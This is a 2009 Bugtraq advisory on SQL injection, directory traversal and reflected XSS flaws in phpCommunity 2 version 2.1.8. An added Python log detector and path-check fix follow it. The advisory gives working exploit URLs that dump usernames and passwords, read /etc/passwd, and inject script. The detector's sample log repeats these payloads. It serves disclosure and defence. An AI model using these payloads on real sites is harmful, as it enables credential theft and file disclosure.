phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
Date: Sat, 7 Mar 2009 18:25:19 +0100
Subject: phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>, str0ke <str0ke@milw0rm.com>
******* Salvatore "drosophila" Fresta *******
[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/
[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS
[+] Exploitation: Remote
[+] Date: 07 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directories on the web server.
- [C] Reflected XSS
[-] Requisites: none
[-] File affected: templates/1/login.php
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25"
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25"
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25"
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
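The following is an added example, not code from the advisory above or from the phpCommunity project. It takes the defender's side of the three bug classes the advisory reports: it parses Common Log Format access-log lines, percent-decodes the query string and flags the parameters the advisory names (a quote followed by UNION ... SELECT in forum_id/topic_id/wert, a ".." segment or absolute path in file/path, a script tag in msg), and it shows the canonical-path check that a show_file.php/show_source.php-style handler needs in order to stay inside its document root. The sample log lines, the client address and the document root are constructed for this example.

```python
"""Detection and path-check helper for the phpCommunity 2.1.8 advisory
(added example, not code from the advisory or the project)."""
import os
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names the advisory associates with each bug class.
SQLI_PARAMS = {"forum_id", "topic_id", "wert"}
TRAVERSAL_PARAMS = {"file", "path"}
XSS_PARAMS = {"msg"}

# Request part of a Common Log Format entry: "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A quote breaking out of the SQL literal, followed by UNION ... SELECT.
SQLI_RE = re.compile(r"""['"].*\bunion\b.*\bselect\b""", re.IGNORECASE | re.DOTALL)
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def looks_like_traversal(value: str) -> bool:
    """True for a '..' path segment or an absolute path in a file parameter."""
    segments = value.replace("\\", "/").split("/")
    return ".." in segments or value.startswith("/")


def classify_request(target: str) -> list[tuple[str, str]]:
    """Return (bug_class, parameter) findings for one request target."""
    query = urlsplit(target).query
    findings = []
    # parse_qs percent-decodes, so %22 / %25 / %3C become the characters PHP sees.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in SQLI_PARAMS and SQLI_RE.search(value):
                findings.append(("sqli", name))
            elif name in TRAVERSAL_PARAMS and looks_like_traversal(value):
                findings.append(("traversal", name))
            elif name in XSS_PARAMS and SCRIPT_RE.search(value):
                findings.append(("xss", name))
    return findings


def scan_log(lines: list[str]) -> dict[int, list[tuple[str, str]]]:
    """Map the index of each suspicious line to its findings; clean lines are omitted."""
    report = {}
    for idx, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify_request(match.group("target"))
            if findings:
                report[idx] = findings
    return report


def resolve_under_root(root: str, requested: str):
    """Canonicalise a user-supplied path and refuse anything outside root.

    This is the check the show_file.php / show_source.php handlers lack: resolve
    the joined path (which collapses '..' and follows symlinks), then require the
    result to remain under the document root. Returns the resolved path or None."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, target]) != root_real:
        return None
    return target


# Constructed sample log: the advisory's request shapes as they would appear
# percent-encoded in an access log, followed by two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [07/Mar/2009:18:25:19 +0100] "GET /path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1\'%20UNION%20ALL%20SELECT%201,2,CONCAT(nick,0x3a,pwd),4,5,6,7,8%20FROM%20com_users%23 HTTP/1.1" 200 2048',
    '203.0.113.10 - - [07/Mar/2009:18:25:21 +0100] "GET /path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25%22%20UNION%20ALL%20SELECT%20CONCAT(nick,0x3a,pwd),2%20FROM%20com_users%23 HTTP/1.1" 200 1536',
    '203.0.113.10 - - [07/Mar/2009:18:25:24 +0100] "GET /path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1820',
    '203.0.113.10 - - [07/Mar/2009:18:25:26 +0100] "GET /path/module/admin/files/show_source.php?path=/etc HTTP/1.1" 200 4096',
    '203.0.113.10 - - [07/Mar/2009:18:25:29 +0100] "GET /path/templates/1/login.php?msg=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 912',
    '198.51.100.7 - - [07/Mar/2009:18:26:02 +0100] "GET /path/index.php?n=guest&c=0&m=forum&s=1&forum_id=12 HTTP/1.1" 200 7310',
    '198.51.100.7 - - [07/Mar/2009:18:26:05 +0100] "GET /path/module/admin/files/show_file.php?file=docs/readme.txt HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for idx, findings in scan_log(SAMPLE_LOG).items():
        print(idx, findings)
    print(resolve_under_root("/srv/www/files", "../../../../etc/passwd"))
```

The detector keys on the parameter names the advisory lists, so it is a targeted rule for this application rather than a general WAF; the same decode-then-inspect order matters because the PoCs arrive with %25 and %23 encoded and only look like SQL after decoding. For the SQL injection bugs the durable fix is a parameterised query rather than relying on magic_quotes_gpc, and for the reflected XSS the msg value must be HTML-escaped on output; resolve_under_root shows the corresponding fix for the two traversal bugs.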